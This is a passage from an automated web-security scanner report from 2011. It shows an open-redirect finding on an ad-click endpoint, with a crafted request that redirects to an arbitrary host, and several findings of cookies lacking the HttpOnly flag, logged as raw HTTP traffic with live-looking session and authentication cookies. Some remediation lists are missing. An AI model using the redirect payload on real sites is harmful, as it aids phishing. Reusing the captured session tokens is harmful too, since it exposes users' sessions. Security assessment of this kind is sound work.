Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CtACQktrYnA1QmEwVGQzd0ZvejJsQWVieXJDd0NkZnEtTk1CbjZDVTdCaWZ4TzNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAyT0RnNE1EWTFOalk0TWpreU5qTTRvQUhEOHYzc0E3SUJGM0IxWWk1eVpYUmhhV3hsY2kxaGJXRjZiMjR1Ym1WMHVnRUtNVFl3ZURZd01GOWhjOGdCQ2RvQlNXaDBkSEE2THk5d2RXSXVjbVYwWVdsc1pYSXRZVzFoZW05dUxtNWxkQzlpWVc1dVpYSmZNVEl3WHpZd01GOWhMbkJvY0Q5elpXRnlZMmc5SlRkQ0pHdGxlWGR2Y21RbE4wU1lBdVFad0FJRXlBS0YwczhLcUFNQjZBTzhBZWdEbEFMMUF3QUFBTVNBQnVpM3pxckJqcktHMFFFEhMIk4a2vpW1qAIVBN7gCh2VGI4LGAEgq9z04ueQw4h2SAE; expires=Tue, 24-May-2011 12:36:41 GMT; path=/pagead/conversion/1033861443/
Cache-Control: private
Location: http://a2e8cc29eb5c3fdf9/a?http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:36:41 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


14. Cookie without HttpOnly flag set  previous  next
There are 88 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



14.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5E86DC9CC3BD60FE3A06221325A71F08; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:29:25 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

14.2. http://affiliate.idgtracker.com/rd/r.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://affiliate.idgtracker.com
Path:   /rd/r.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1 HTTP/1.1
Host: affiliate.idgtracker.com
Proxy-Connection: keep-alive
Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:09:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=g7dpq2uc614mccbr73j7na1id6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR STP COM", policyref="/w3c/p3p.xml"
Set-Cookie: test=test
Location: http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1&cenhp1=1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.3. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_15&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=0%2C0&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=4D2F096A244DBA369FB4DA24E6E71E58

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=37CA52C814AA647559229DADBB815529; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Sun, 24 Apr 2011 12:26:22 GMT


14.4. http://img.securepaynet.net/image.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.securepaynet.net
Path:   /image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.296151316862624&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=30&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet HTTP/1.1
Host: img.securepaynet.net
Proxy-Connection: keep-alive
Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; path=/
Set-Cookie: pagecount=1; domain=.securepaynet.net; path=/
Set-Cookie: fb_pagecount=1; path=/
Set-Cookie: actioncount=; domain=.securepaynet.net; path=/
Set-Cookie: fb_actioncount=; path=/
Set-Cookie: app_pathway=; domain=.securepaynet.net; path=/
Set-Cookie: fb_session=S_TOUCH=04/24/2011 12:42:14&pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b&V_DATE=04/24/2011 05:42:14; path=/
Set-Cookie: isc=kro_2011; domain=.securepaynet.net; path=/
Set-Cookie: visitor=vid=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; expires=Mon, 23-Apr-2012 12:42:14 GMT; path=/
Set-Cookie: traffic=; domain=.securepaynet.net; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sun, 24 Apr 2011 12:42:13 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.5. http://leadback.netseer.com/dsatserving2/servlet/log  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://leadback.netseer.com
Path:   /dsatserving2/servlet/log

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/log?pxid=1124&nlt=ltpx&url=http%3A%2F%2Fwww.identityguard.com%2Fipages%2Fle4%2Fletp30daysfree1.html%3Fmktp%3DNext%26utm_medium%3Daffiliates%26hid%3D205557649%26campid%3D13%26c1%3Did4%2B106163471CD1%26c2%3DCD1%26cenhp1%3D1&impt=0&imps=0 HTTP/1.1
Host: leadback.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6FE9E355E2568F5F32FAD5F08891554D.dsat4; Path=/dsatserving2
Set-Cookie: netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; Version=1; Domain=.netseer.com; Max-Age=31536000; Path=/
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Content-Type: image/png
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Length: 70

.PNG
.
...IHDR....................IDATx.c``...........}....IEND.B`.

14.6. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:36:12 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000KToyasEeVy_fQHf6TuSK9Mc:14ej3pg70; Path=/
Set-Cookie: REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; Expires=Sun, 08 May 2011 03:35:20 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002777198=100000002777198%2cVoEQEMAaxiiOxH5%2fHe03xssaVwY%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002777198=100000002777198%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblgaG4LolUzuM7owtK6Gi%2bVaq7muVpgRvizF3GEYunmq5qAGshvG%2fXVXEJobjTsDIa%0auhm1cgxjc8Dg7Bta%2bhk6VW6qOQMB228jrA07GAd7ulM%2f%2bYbi2c00FUf8MBs4lni1kKc%2bItFLUY8t%0a%2bqcUB9ES; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


14.7. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...

14.8. http://www.dictof.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dictof.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/pub/banner_728_90_random.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:40:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=9ED7BF71162535497E7BF851F34974FF.w1; Path=/
Set-Cookie: lc=en; Path=/
Set-Cookie: CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_DATE_COOKIE=1303648808195; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Set-Cookie: CAMPAIGNE.ENTRY_URI_COOKIE=%2F; Expires=Fri, 12-May-2079 15:54:15 GMT; Path=/
Content-Language: en
Content-Length: 34995

